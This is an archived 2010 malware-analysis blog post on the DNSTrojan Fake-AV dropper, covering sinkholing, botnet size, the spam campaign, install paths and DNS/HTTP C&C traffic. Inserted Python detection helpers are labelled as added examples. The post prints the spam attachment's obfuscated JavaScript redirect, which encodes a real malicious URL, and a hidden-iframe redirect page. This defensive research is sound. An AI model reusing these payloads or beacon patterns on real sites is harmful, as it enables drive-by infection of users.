Monthly Archives: September 2010

Mitigating the DNSTrojan Threat

A few days ago I published a short analysis of a Trojan dropper which I call DNSTrojan (see New Dropper Uses DNS To Communicate). During this week I tried to mitigate the threat by nuking at least some of the DNSTrojan C&C domain names, pointing them to my sinkhole.

In the first attempt I was able to redirect the traffic of the C&C servers to my sinkhole for around 9 hours. Afterwards the cybercriminals propagated a new C&C domain to the infected clients using (the infected clients regularly contact using DNS to receive a list of C&C domains they should use).

A few hours later I was able to sinkhole the new domain name as well. Below is a chart showing the number of Apache handlers during the time the domain names have pointed to the sinkhole:

As you can see, the sinkhole had a huge server load. In total, the C&C traffic has been redirected to my sinkhole for 10 hours. During this time I was able to count 23’000 unique IPs hitting the sinkhole, so I estimate the botnet size at 35k-50k unique IPs per day. This seems to be a huge number, but in fact this isn’t a really BIG botnet (for comparison: recently I was able to monitor a botnet which had a size of over 320’000 unique IPs per day).

Below is a chart which shows the botnet Geo location of the Trojan:

During the sinkhole action I was confronted with an unexpected problem: the botnet size wasn’t the issue, but the fact that each bot queries the C&C every 30 seconds drove my server into performance problems. As you can see on the chart above, it ended with a downtime of the sinkhole server. In cooperation with Shadowserver I have now moved the domain names over to Shadowserver’s sinkhole, which should be able to handle that amount of requests easily.

In the last blog post I published a list of C&C domains which are associated with the Trojan. Below is an updated list with the additional domain names I have come across so far:

Another interesting find I made during the sinkholing action is that the cybercriminals are obviously using some kind of monitoring server. They periodically call a PHP file named check.php on the C&C domain names to check whether the servers are still reachable:

“HEAD /check.php HTTP/1.1” 200 “curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/ libidn/1.8 libssh2/0.18”
“HEAD /check.php HTTP/1.1” 200 “curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/ libidn/1.8 libssh2/0.18”

The two monitoring servers are located in Sweden and the Netherlands:

IP address:
AS number: AS49770
AS name: SERVERCONNECT-AS ServerConnect Sweden AB
Country: Sweden

IP address:
AS number: AS16265
Country: Netherlands

If we put the things together we can draw the following picture:

As shown above, the C&C servers are obviously just acting as nginx proxies which forward the traffic to the real mothership (which is currently unknown). Here is the list of nginx proxies I have identified so far:

| IP address | Country | AS number | AS name |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |
| | US | AS32097 | WII-KC – WholeSale Internet, Inc. |

Let’s see where they are moving to during the next few days…

New Dropper Uses DNS To Communicate

During the last few weeks I have monitored a new dropper which uses DNS and HTTP in combination to communicate with its Command&Control server (C&C).

I first saw the Trojan on 2010-06-08 being dropped by a well-known exploit kit called NeoSploit. The AV detection rate is pretty good: most of the AV vendors are currently detecting the binaries which are used to spread the Trojan as Fake-AV. As far as I have seen, this Trojan is just a dropper which drops additional Fake-AV software.

Back in June, when I first saw the Trojan, I added a signature to AMaDa. Hence AMaDa will tag the binaries and URLs which are associated with this Trojan as DNSTrojan.

In September 2010, I just saw a peak on AMaDa in new URLs propagating DNSTrojan:

Over the past days I have seen dozens of domain names popping up which are being used to spread the Trojan (using drive-by exploits). Here are some of them:

As already mentioned before, the Trojan is just being used to drop Fake-AV software. For now I’ve identified the following domain names which are associated with this Fake-AV campaign:

*** Spam Mails propagating the DNSTrojan ***

This week I found dozens of spam mails in my honeypots which had an HTML file attached. Some of the subjects I have seen so far are:

  • Consultation Appointment
  • Questions
  • Outstanding invoice – 9386 Ltd
  • Nivea commercial payment
  • Appraisal – Killington $155000
  • Re: GO HOME + SHE SAID /
  • Transaction Breakdown
  • Offer on Killington
  • Fwd: Addendum to extend close of escrow!
  • Signatures to Intercreditor
  • demands for payment
  • Mortgage Breakdown PITI
  • notes from last week
  • and many more…

The HTML files which are attached to all those spam mails contain JavaScript code:

<script type='text/javascript'>
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m=""; for (i=0; i<s.length; i++) { // each char of s is shifted by +1; codes 28/23 stand for '&'/'!'
  if (s.charCodeAt(i) == 28) { m += '&'; }
  else if (s.charCodeAt(i) == 23) { m += '!'; }
  else { m += String.fromCharCode(s.charCodeAt(i)-1); }
} // the remainder of the script, where the decoded m is used, is cut off on the page
</script>

Hum? Obfuscated JavaScript code. If we decode it, the following HTML code appears:

<meta http-equiv="refresh" content="0;url=" />
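Added example (not code from the original post): a Python helper for mail-gateway or sandbox triage that finds the obfuscated payload string in an attachment, reverses the shift-by-one scheme shown above and pulls out the refresh target. The attachment is constructed for this example and points at an example.invalid host; the regexes are assumptions about the campaign's layout, not data from the post.

```python
import re
from typing import Optional

# Constructed sample attachment using the same obfuscation scheme as the
# spam campaign (every character shifted up by one; codes 28 and 23 stand
# for '&' and '!'). The encoded target is example.invalid, not a real host.
SAMPLE_ATTACHMENT = """<html><body>
<script type='text/javascript'>
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00fybnqmf/jowbmje0y/iunm#!0?";
m=""; for (i=0; i<s.length; i++) { /* decoder loop as seen in the wild */ }
document.write(m);
</script></body></html>"""

# Assumed layout of the payload and of the decoded meta refresh tag.
VAR_S_RE = re.compile(r'var\s+s\s*=\s*"([^"]*)"')
REFRESH_RE = re.compile(r'content\s*=\s*"\s*\d+\s*;\s*url=([^"]+)"', re.IGNORECASE)


def decode_shift1(s: str) -> str:
    """Reverse the attachment's obfuscation: each character is shifted down by
    one, except the control codes 28 and 23, which decode to '&' and '!'."""
    out = []
    for ch in s:
        code = ord(ch)
        if code == 28:
            out.append('&')
        elif code == 23:
            out.append('!')
        else:
            out.append(chr(code - 1))
    return ''.join(out)


def extract_refresh_target(html: str) -> Optional[str]:
    """Locate the obfuscated string, decode it and return the URL that the
    generated <meta http-equiv="refresh"> would send the victim to, or None."""
    m = VAR_S_RE.search(html)
    if not m:
        return None
    decoded = decode_shift1(m.group(1))
    r = REFRESH_RE.search(decoded)
    return r.group(1) if r else None


if __name__ == "__main__":
    print(decode_shift1(VAR_S_RE.search(SAMPLE_ATTACHMENT).group(1)))
    print(extract_refresh_target(SAMPLE_ATTACHMENT))
```

The extracted URL is what you would feed into a blocklist or a sandbox follow-up fetch rather than letting a mail client render the attachment.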

The JavaScript code embedded in the malicious attachment redirects the victim to a hijacked website which displays the following message in the web browser:

For now I’ve seen the following hijacked websites involved in this spam campaign:

The hijacked website tries to do two things:

  1. Install the ZeuS banking Trojan using drive-by exploits (see AMaDa)
  2. Redirect the victim once again to a site controlled by the cybercriminals to distribute DNSTrojan

The HTML source code of the hijacked websites (x.html) looks like this:

<meta http-equiv="refresh" content="4;url=" />
<iframe width="0" height="0" src=" [...]"></iframe>

Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to convince the victim that their computer is infected with malware and offers them a malicious EXE file:

The binary served by those websites contains the DNSTrojan and is being detected as “Fake-AV” by most AV vendors:

Filename: antivirus.exe
File size : 169984 bytes
MD5 : a00b75b0d43702d4b099548b90c715c7
SHA1 : 559a83509db3969f5207615d48fe70dcb1997bb8
VT: 33 /43 (76.7%)

As of 2010-09-21 19:00 UTC, the spam campaign is still going on.

*** The DNSTrojan ***
Let’s take a closer look at the Trojan which is being dropped. The Trojan installs itself into the following directories:

c:\program files\common files\microsoft shared\web folders\servemonsonsext.exe
c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe
c:\program files\common files\microsoft shared\TextConv\quillmsconv97.exe

Note that the file names used by the Trojan vary. Additionally, the Trojan has an interesting behavior when Apple QuickTime is installed on the victim’s computer: it installs itself into the QuickTime directory:

c:\program files\quicktime\pictureviewer.resources\nl.lproj\quicktimequicktime.exe
c:\program files\apple software update\softwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe
c:\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe

In the next step the Trojan contacts its first Command&Control server, which is located at . The interesting thing is that the Trojan uses DNS instead of HTTP to communicate with the C&C in this first stage:

Standard query TXT
Standard query response TXT

The Trojan sends a DNS TXT query to every few minutes, using the current UNIX timestamp as the subdomain (*unixtimestamp*). The C&C server replies with an encrypted string (which seems to be always the same):

$ dig TXT +short
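Added example (not from the original post): detection logic for the DNS stage described above, run over constructed resolver log lines. It flags TXT queries whose leftmost label is a 10-digit UNIX timestamp close to the query time, groups them per client and parent domain, and reports the beacon interval. The log format, the 300-second tolerance and the cnc.example.invalid domain are assumptions for this example.

```python
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Constructed resolver log: "date time client qtype qname" (UTC). The TXT
# queries from 10.0.0.5 mimic the *unixtimestamp*.<c&c domain> pattern;
# the dkim line is a benign TXT lookup that must not be flagged.
SAMPLE_LOG = """\
2010-09-21 19:00:01 10.0.0.5 TXT 1285095601.cnc.example.invalid
2010-09-21 19:00:02 10.0.0.5 A www.example.org
2010-09-21 19:03:01 10.0.0.5 TXT 1285095781.cnc.example.invalid
2010-09-21 19:06:01 10.0.0.5 TXT 1285095961.cnc.example.invalid
2010-09-21 19:01:00 10.0.0.9 TXT 20100921.dkim.example.org
"""


def is_timestamp_label(label: str, query_time: int, tolerance: int = 300) -> bool:
    """True when the label is a 10-digit UNIX time within `tolerance` seconds
    of the moment the query was logged (the bot uses its current clock)."""
    if not (label.isdigit() and len(label) == 10):
        return False
    return abs(int(label) - query_time) <= tolerance


def find_txt_beacons(log: str, min_hits: int = 2) -> Dict[Tuple[str, str], List[int]]:
    """Return {(client, parent domain): [seconds between consecutive hits]}
    for every client that sent at least `min_hits` timestamp-labelled TXT
    queries to the same parent domain."""
    hits: Dict[Tuple[str, str], List[int]] = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        date, clock, client, qtype, qname = line.split()
        if qtype != "TXT":
            continue
        qtime = int(datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S")
                    .replace(tzinfo=timezone.utc).timestamp())
        first_label, _, parent = qname.partition(".")
        if is_timestamp_label(first_label, qtime):
            hits[(client, parent)].append(qtime)
    return {key: [b - a for a, b in zip(times, times[1:])]
            for key, times in hits.items() if len(times) >= min_hits}


if __name__ == "__main__":
    for (client, domain), intervals in find_txt_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {domain}: intervals {intervals}s")
```

The reported interval is the part worth alerting on: a client that re-queries the same parent domain on a fixed cadence with ever-changing timestamp labels is behaving like the beacon, regardless of which C&C domain is current.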

Afterwards the Trojan resolves the domain name and contacts a second C&C server located at . This time the Trojan uses HTTP to communicate with the C&C:

GET /httpss/v=&step=2&hostid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

The C&C server answers with an HTTP 404 (Not Found), but the response nevertheless contains encrypted data. I assume the cybercriminals are doing this to fool security researchers and IDS/IPS:

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


Last but not least, the Trojan queries a third C&C server located at every 30 seconds:

GET /getfile.php?r=XXXX&p= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Note that the p parameter is a base64 encrypted string containing the values “MACHINE”, “OP” and “TRK”.

*** Conclusion ***

  • The Trojan is pretty new (first seen in June 2010)
  • The detection rate on the Trojan binaries is currently pretty good
  • The Trojan uses DNS and HTTP to communicate with the C&C
  • The Trojan drops Fake-AV software (using “getfile.php”)

I recommend blocking access to the following domain names, which are associated with DNSTrojan:

( – AS32097 WII-KC – WholeSale Internet, Inc.)
( – AS32097 WII-KC – WholeSale Internet, Inc.)
( – AS32097 WII-KC – WholeSale Internet, Inc.)